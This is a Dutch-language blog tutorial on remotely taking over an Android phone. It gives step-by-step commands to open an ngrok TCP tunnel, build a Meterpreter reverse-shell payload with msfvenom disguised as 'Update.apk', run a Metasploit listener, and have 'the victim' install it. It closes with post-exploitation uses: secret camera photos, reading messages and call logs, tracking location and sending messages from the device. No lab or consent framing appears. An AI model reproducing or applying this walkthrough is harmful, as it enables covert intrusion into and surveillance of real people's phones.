Hacking Android Device [Remote]

Hacking over WAN

U kunt mijn video-handleiding op YouTube hier bekijken:
https://youtu.be/Bbp-AcejtHI

Vaak in WAN, ten eerste, moet je een Static IP/Hostname hebben en ten tweede, moet je Port Forwarding doen om je verkeer te kunnen verzenden, en we weten allemaal dat beide zo moeilijk zijn in real-time omdat we beperkte toegang hebben tot poorten in een netwerk.

Dus, wat we in dit scenario gaan doen, we gaan een beveiligde tunnel opzetten met Ngrok.

Ngrok is een tunneling reverse proxy systeem dat tunnels tot stand brengt van een publiek eindpunt, d.w.z. een internet naar een lokaal draaiende netwerk service. Dit kan ons helpen om een publieke HTTP/HTTPS URL te maken voor een website die lokaal op onze machine draait. We hoeven geen port forwarding te doen als we Ngrok gebruiken en onze netwerk service zal uiteindelijk op het internet uitkomen met behulp van TCP tunneling.

Volg deze stappen om verder te gaan:

Stap1: Meld je aan voor Ngrok Account om het te downloaden.

Eerst moet je je aanmelden voor de Ngrok Account, daarna zal het je vragen om het download venster te openen.

Aanmeldingsvenster van Ngrok

Nadat u zich heeft aangemeld, kunt u de Ngrok downloaden voor uw Linux systeem.

Pak het gedownloade bestand uit.

Stap2: Verbind uw account

Door dit commando uit te voeren wordt uw auth token toegevoegd aan het standaard ngrok.yml configuratiebestand. Dit geeft u toegang tot meer mogelijkheden en langere sessietijden. (U moet uw eigen token hier kopiëren en plakken die u in het beginscherm van ngrok krijgt nadat u bent ingelogd)

./ngrok authtoken <uw token>

Nu bent u klaar om deze tool te gebruiken. Open uw terminal en ga naar de directory waar u de Ngrock tool heeft uitgepakt en typ:

./ngrok tcp

Kies een poort nummer waarop u een verbinding wilt binden (hier, heb ik 5555 gekozen als poort nummer). En na het drukken op enter, zal er een scherm tevoorschijn komen dat er ongeveer zo uitziet.

De forwarding hier specificeert de TCP tunnel die ngrok heeft aangemaakt. De verbinding is gebonden aan de localhost op poort 5555. Nu moeten we een kwaadaardige payload genereren met behulp van msfvenom.

Step3: Payload genereren

U kunt dit doen door een nieuwe Terminal te openen in uw Kali Linux Machine en dan de volgende code in te typen.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Maar onthoud, deze keer is het een beetje anders dan de aanval die we vroeger in het LAN uitvoerden. Hier moeten we in plaats van het IP adres, de doorstuur link invoeren die in ngrok zit (2.tcp.ngrok.io). En het poortnummer zal 15787 zijn. Onthoud dat het belangrijk is om hetzelfde poortnummer in te voeren dat door Ngrok is opgegeven bij port forwarding.

Note: Als het invoeren van het IP adres als 2.tcp.ngrok.io niet werkt, kun je het vervangen door een IP adres dat je kunt krijgen door het “ping” commando te gebruiken.
Open een terminal en typ ping 2.tcp.ngrok.io en druk op enter. Je krijgt een IP adres dat je in de plaats van LHOST moet zetten.

Hier, heb ik “Update.apk” gebruikt als de bestandsnaam voor onze payload. Dit bestand moet worden geïnstalleerd op het Android toestel van ons doelwit. Maar voordat we dit bestand installeren, moeten we onze luisteraar instellen. Om dit te doen, volg stap 4.

Step4: Set-Up a Listener

Open je terminal en laad Metasploit console, door te typen: msfconsole
Nadat het geladen is (na een paar seconden), laad multi-handler exploit door te typen:

use exploit/multi/handler

Stel nu een reverse payload in door te typen:

set payload android/meterpreter/reverse_tcp

Stel je LHOST in als 0.0.0.0 en LPORT als 5555
(Het poortnummer moet hetzelfde zijn als het poortnummer dat werd gebruikt om de verbinding in de ngrok te binden)

set LHOST 0.0.0.0
set LPORT 5555

Typ ten slotte exploit om de listener te starten.

De luistermodus staat aan

Stap5: Installeer het bestand Malicious Update.apk op het apparaat van het doelwit

Laat het slachtoffer de app installeren en voer deze uit zodra deze is geïnstalleerd. Wanneer het slachtoffer de open app optie aanraakt, krijg je toegang tot alle functies van het android toestel. Er wordt echter niets weergegeven op het scherm van het apparaat nadat de app is geopend.

Post-Exploitation

Type help om de verschillende opties te zien die je kunt gebruiken om de verschillende taken op het apparaat van het slachtoffer uit te voeren.
Je kunt toegang krijgen tot hun camera en een foto maken zonder ze op de hoogte te stellen. U kunt hun berichten en gesprekslogboeken controleren en ze ook in uw systeem opslaan.
Ook kunt u bekijken en openen van elke applicatie geïnstalleerd op hun apparaat. U kunt zelfs de huidige locatie coördinaten van de gebruiker.
U kunt ook berichten sturen naar een contact nummer via hun device.

Geef een antwoord

Het e-mailadres wordt niet gepubliceerd.